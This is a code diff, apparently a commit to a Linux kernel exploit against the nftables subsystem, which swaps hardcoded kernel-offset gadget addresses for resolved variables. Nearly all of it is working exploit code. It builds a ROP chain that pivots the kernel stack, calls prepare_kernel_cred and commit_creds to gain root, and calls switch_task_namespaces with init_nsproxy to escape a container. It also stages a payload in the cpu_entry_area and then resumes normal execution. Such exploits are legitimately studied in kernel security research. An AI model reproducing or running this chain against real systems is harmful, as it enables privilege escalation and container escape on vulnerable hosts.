@@ -185,7 +185,7 @@ void setup_registers(struct payload* payload, int64_t kernel_off) {
185185 // essentially we copy a stack pivot gadget into them
186186 // the payload will be copied directly from the packet we send to trigger the payload
187187
188- * (u64 * )((u8 * )rop_chain_rsi + 0xF ) = kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET ;
188+ * (u64 * )((u8 * )rop_chain_rsi + 0xF ) = pop_rsp_add_rsp_0x20_pop_rbx ; // kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET;
189189
190190 const u32 * regs = rop_chain_rsi ;
191191 int j = 0 ;
@@ -194,7 +194,7 @@ void setup_registers(struct payload* payload, int64_t kernel_off) {
194194 continue ;
195195 }
196196
197- payload -> fast_exprs [j ].fast_ops = kernel_off + NFT_PAYLOAD_FAST_OPS ;
197+ payload -> fast_exprs [j ].fast_ops = nft_payload_fast_ops ; // kernel_off + NFT_PAYLOAD_FAST_OPS;
198198 payload -> fast_exprs [j ].base = NFT_PAYLOAD_NETWORK_HEADER ;
199199 // offset of our skb payload data
200200 payload -> fast_exprs [j ].offset = 0x1c + i * 4 ;
@@ -220,30 +220,30 @@ void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
220220 int i = 0x20 / 8 ;
221221
222222 // had some issue with object boundaries. Lets get some more stack space ..
223- rop_chain [i ++ ] = kernel_off + ADD_RSP_0X88_RET ;
223+ rop_chain [i ++ ] = add_rsp_0x88 ; // kernel_off + ADD_RSP_0X88_RET;
224224 i += 0x88 / 8 ;
225- rop_chain [i ++ ] = kernel_off + ADD_RSP_0X88_RET ;
225+ rop_chain [i ++ ] = add_rsp_0x88 ; // kernel_off + ADD_RSP_0X88_RET;
226226 i += 0x88 / 8 ;
227- rop_chain [i ++ ] = kernel_off + ADD_RSP_0X88_RET ;
227+ rop_chain [i ++ ] = add_rsp_0x88 ; // kernel_off + ADD_RSP_0X88_RET;
228228 i += 0x88 / 8 ;
229- rop_chain [i ++ ] = kernel_off + ADD_RSP_0X88_RET ;
229+ rop_chain [i ++ ] = add_rsp_0x88 ; // kernel_off + ADD_RSP_0X88_RET;
230230 i += 0x88 / 8 ;
231231
232- rop_chain [i ++ ] = kernel_off + POP_RDI_RET ;
233- rop_chain [i ++ ] = kernel_off + INIT_TASK ;
234- rop_chain [i ++ ] = kernel_off + PREPARE_KERNEL_CRED ;
232+ rop_chain [i ++ ] = pop_rdi ; // kernel_off + POP_RDI_RET;
233+ rop_chain [i ++ ] = init_task ; // kernel_off + INIT_TASK;
234+ rop_chain [i ++ ] = prepare_kernel_cred ; // kernel_off + PREPARE_KERNEL_CRED;
235235
236- rop_chain [i ++ ] = kernel_off + MOV_RDI_RAX_RET ;
237- rop_chain [i ++ ] = kernel_off + COMMIT_CREDS ;
236+ rop_chain [i ++ ] = mov_rdi_rax ; // kernel_off + MOV_RDI_RAX_RET;
237+ rop_chain [i ++ ] = commit_creds ; // kernel_off + COMMIT_CREDS;
238238
239- rop_chain [i ++ ] = kernel_off + POP_RDI_RET ;
239+ rop_chain [i ++ ] = pop_rdi ; // kernel_off + POP_RDI_RET;
240240 rop_chain [i ++ ] = 1 ;
241- rop_chain [i ++ ] = kernel_off + FIND_TASK_BY_VPID ;
241+ rop_chain [i ++ ] = find_task_by_vpid ; // kernel_off + FIND_TASK_BY_VPID;
242242
243- rop_chain [i ++ ] = kernel_off + MOV_RDI_RAX_RET ;
244- rop_chain [i ++ ] = kernel_off + POP_RSI_RET ;
245- rop_chain [i ++ ] = kernel_off + INIT_NSPROXY ;
246- rop_chain [i ++ ] = kernel_off + SWITCH_TASK_NAMESPACES ;
243+ rop_chain [i ++ ] = mov_rdi_rax ; // kernel_off + MOV_RDI_RAX_RET;
244+ rop_chain [i ++ ] = pop_rsi ; // kernel_off + POP_RSI_RET;
245+ rop_chain [i ++ ] = init_nsproxy ; // kernel_off + INIT_NSPROXY;
246+ rop_chain [i ++ ] = switch_task_namespaces ; // kernel_off + SWITCH_TASK_NAMESPACES;
247247
248248 // prepare to restore execution
249249 // nft_do_chain:
@@ -252,25 +252,25 @@ void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
252252 // lea r12, [rsp+0x48]
253253 // exit:
254254 // ffffffff81e517eb: 89 d0 mov %edx,%eax
255- rop_chain [i ++ ] = kernel_off + POP_RBP_RET ;
255+ rop_chain [i ++ ] = pop_rbp ; // kernel_off + POP_RBP_RET;
256256 rop_chain [i ++ ] = 0x220 - 0x48 ;
257- rop_chain [i ++ ] = kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET ;
257+ rop_chain [i ++ ] = lea_rax_r12_plus_rbp_pop5 ; // kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET;
258258 i += 5 ;
259259
260260 // prepare the stack restore gadget
261- rop_chain [i ++ ] = kernel_off + POP_RCX_RET ;
261+ rop_chain [i ++ ] = pop_rcx ; // kernel_off + POP_RCX_RET;
262262 rop_chain [i ++ ] = PAYLOAD_LOCATION (HELPER_CPU ) + offsetof(struct cpu_entry_area_payload , pop_rsp_jmp_rsi_0xf );
263263
264264 // prepare the return jmp gadget
265- rop_chain [i ++ ] = kernel_off + POP_RSI_RET ;
265+ rop_chain [i ++ ] = pop_rsi ; // kernel_off + POP_RSI_RET;
266266 rop_chain [i ++ ] = PAYLOAD_LOCATION (HELPER_CPU ) + offsetof(struct cpu_entry_area_payload , nft_do_chain_leave ) - 0xf ;
267267
268268 // setup the return vaule
269- rop_chain [i ++ ] = kernel_off + POP_RDX_RET ;
269+ rop_chain [i ++ ] = pop_rdx ; // kernel_off + POP_RDX_RET;
270270 rop_chain [i ++ ] = NF_DROP ;
271271
272272 // actually restore execution
273- rop_chain [i ++ ] = kernel_off + PUSH_RAX_JMP_RCX ;
273+ rop_chain [i ++ ] = push_rax_jmp_rcx ; // kernel_off + PUSH_RAX_JMP_RCX;
274274}
275275
276276
@@ -310,9 +310,9 @@ static void setup_cpu_entry_area(int64_t kernel_off) {
310310 }
311311
312312 struct cpu_entry_area_payload payload = {};
313- payload .nft_expr_eval = kernel_off + POP_RSP_JMP_RSI_0XF ;
314- payload .pop_rsp_jmp_rsi_0xf = kernel_off + POP_RSP_JMP_RSI_0XF ;
315- payload .nft_do_chain_leave = kernel_off + NFT_DO_CHAIN_LEAVE ;
313+ payload .nft_expr_eval = push_rdi_jmp_rsi_0xf ; // kernel_off + POP_RSP_JMP_RSI_0XF;
314+ payload .pop_rsp_jmp_rsi_0xf = pop_rsp_jmp_rsi_0xf ; // kernel_off + POP_RSP_JMP_RSI_0XF;
315+ payload .nft_do_chain_leave = nft_do_chain_leave ; // kernel_off + NFT_DO_CHAIN_LEAVE;
316316
317317 PANIC_IF (_pin_to_cpu (HELPER_CPU ) < 0 );
318318 PANIC_IF (signal (SIGFPE , sig_handler ) == SIG_ERR );
0 commit comments